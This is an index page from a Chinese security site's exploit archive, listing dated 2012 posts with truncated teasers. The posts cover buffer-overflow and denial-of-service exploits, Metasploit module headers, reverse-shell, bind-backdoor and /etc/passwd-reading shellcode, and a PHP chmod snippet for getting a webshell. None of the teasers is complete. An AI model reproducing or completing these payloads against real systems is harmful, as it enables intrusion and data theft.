首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
Blade API Monitor Unicode Bypass (Serial Number BOF)
  日期:2012-02-21 10:06:07 点击:96 评论:0
#!/usr/bin/python -w #---------------------------------------------------------------------------------# # Exploit: Blade API Monitor Unicode Bypass (Serial Number BOF) # # Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com # # http://www.fuz
linux提权之跨目录访问拿webshell代码
  日期:2012-02-20 14:56:59 点击:298 评论:0
linux主机的权限设置一般情况下都很松散,少有的一些还是不能直接跨目录访问。 在linux不能提权的情况下,可以试试这些代码来跨目录试试。 第一个exp代码: PHP代码 ?php $path =stripslashes( $_GET [ 'path' ]); $ok =chmod( $path ,0777); if ( $ok ==true) echoCHM
PCAnywhere 12.5.0 build 463 Denial of Service
  日期:2012-02-20 14:52:39 点击:39 评论:0
#!/usr/bin/python ''' Exploit Title: PCAnywhere Nuke Date: 2/16/12 Author: Johnathan Norman spoofy at exploitscience.org or @spoofyroot Version: PCAnyWhere (12.5.0 build 463) and below Tested on: Windows Description: The following code will crash the
Horde 3.3.12 Backdoor Arbitrary PHP Code Execution
  日期:2012-02-20 14:42:59 点击:148 评论:0
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framewor
Java MixerSequencer Object GM_Song Structure Handling Vulnerability
  日期:2012-02-17 11:11:39 点击:51 评论:0
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framewor
windows xp sp2 [ ARABIC] backconnect + acceptconnection shellcode =376 (bytes)
  日期:2012-02-16 11:14:42 点击:46 评论:0
-#-#-#-#-#-#-#-##~ Title : windows xp sp2 [ ARABIC] backconnect + acceptconnection shellcode =376 (bytes)#~ Author : TrOoN#~ E-mail : www.facebook.com/fysl.fyslm#~ Home : city 617 logt Draria algeria |#~ Web Site : www.1337day.com#~ platform :window
Linux x86 BackBox BackConnect & Reverse TCP SSL shellcode 442 byte(s)
  日期:2012-02-13 11:02:53 点击:98 评论:0
# Title :Linux x86 BackBox BackConnect Reverse TCP SSL shellcode 442 byte(s)# Author : TrOoN# E-mail : www.facebook.com/fysl.fyslm# Home : city 617 logt Draria algeria# Web Site : www.1337day.com# platform :backboX 32 bit Eng# Type : local root / ex
Backbox /etc/passwd read shellcode 65 byte(s)
  日期:2012-02-13 10:52:00 点击:121 评论:0
#Title : Backbox /etc/passwd read shellcode 65 byte(s)#Author : TrOoN#E-mail : www.facebook.com/fysl.fyslm #Home : city 617 logt Draria algeria #Web Site : www.1337day.com#Type : local root / exploit / shellcode / etc#Tested on : backbox 32 bit ENG#
Shellcode linux/x86 reverse shell
  日期:2012-02-13 10:51:26 点击:95 评论:0
Shellcode linux/x86 reverse shell;Author : Gaussillusion ;Len : 91 byte;x31xc0x31xdbx31xd2x50xb0x66x43x52;x6ax01x6ax02x80xe1xcdx80x66xbex02;x00x89xc7xb0x66xb3x03x68x7fx00x00;x01x66x68x27x10x66x56x89xe2x6ax
Backbox Linux/x86 shutdown shellcode 51 byte ( lunix )
  日期:2012-02-13 10:50:34 点击:67 评论:0
# Title : Backbox Linux/x86 shutdown shellcode 51 byte ( lunix )# Author : TrOoN# E-mail : www.facebook.com/fysl.fyslm# Home : city 617 logt Draria algeria# Web Site : www.1337day.com# Facebook : https://www.facebook.com/fysl.fyslm# platform : back
jetVideo 8.0.2 Denial of Service
  日期:2012-02-13 10:47:23 点击:31 评论:0
# Exploit Title: [jetVideo Crash Exploit] # Author: [Senator of Pirates] # Email : [Senator.of.Pirates.team@gmail.com] # Software Link: [http://www.jetaudio.com/download/jetvideo.html] # Version: [8.0.2 Basic] # Tested on: [Windows XP PS3 En] header
Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow
  日期:2012-02-13 10:46:35 点击:124 评论:0
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framewor
Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Over
  日期:2012-02-13 10:45:26 点击:91 评论:0
## # $Id: $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasplo
os-x/x86 bind backdoor tcp port 4444 - 97 bytes
  日期:2012-02-10 10:44:36 点击:568 评论:0
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=00 _ __ __ __ 11 /' __ /'__` / __ /'__` 00 /_, ___ /_/_ ___ ,_/ / _ ___ 11 /_/ /' _ ` / /_/___ /'___ / /`'__ 00 / /
Sysax Multi Server <= 5.52 File Rename BoF RCE (Egghunter)
  日期:2012-02-10 10:43:27 点击:66 评论:0
#!/usr/bin/python ########################################################################################################## #Title: Sysax Multi Server = 5.52 File Rename BoF RCE (Egghunter) #Author: Craig Freyman (@cd1zz) #Tested on: XP SP3 32bit an
PeerBlock 1.1 BSOD
  日期:2012-02-10 10:41:10 点击:2838 评论:0
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ======================================================================================================= ====================================================================================================
SciTools Understand 2.6 DLL Loading Code Execution
  日期:2012-02-09 11:39:34 点击:122 评论:0
/*SciTools Understand 2.6 (wintab32.dll) DLL Loading Arbitrary Code ExecutionVendor: Scientific Toolworks, Inc.Product web page: http://www.scitools.comAffected version: 2.6 (build 598)Summary: Understand is a static analysis tool for maintaining, m
mozilla firefox <= 10.0 local null byte bypass file check execution exploit
  日期:2012-02-09 11:34:42 点击:60 评论:0
!-- [+] mozilla firefox = 10.0 local null byte bypass file check execution exploit -- !-- -- !-- Vuln risk level: Medium -- !-- Author: Todor Donev -- !-- Author mail: todor.donev@@gmail.com -- !-- -- !-- Description: Allows local attackers to bypass
TORCS <= 1.3.2 xml buffer overflow /SAFESEH evasion
  日期:2012-02-09 11:33:57 点击:48 评论:0
/* Exploit Title: TORCS = 1.3.2 buffer overflow /SAFESEH evasion # Date: 07/02/2012 # Discovered and exploited by: Fluidsignal Group - Research Team Division # Author: Andres Gomez and David Mora (a.k.a Mighty-D) ... Pwn and beans! # Software Link: h
linux/x86 sys_execve("/sbin/sysctl") 121 bytes polymorphic shellcode
  日期:2012-02-09 11:31:16 点击:52 评论:0
/* sys_execve(/sbin/sysctl, { /sbin/sysctl, -w, kernel.randomize_va_space=0 }, NULL); * 121 bytes polymorphic shellcode * Programmer : Paulus Gandung Prakosa_ (syn-attack) * Thanks to : mywisdom, gunslinger_, nofia fitri, chaer.newbie, wenkhairu, ke
共637页/12733条记录 首页 上一页 [258] [259] [260] 261 [262] [263] [264] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved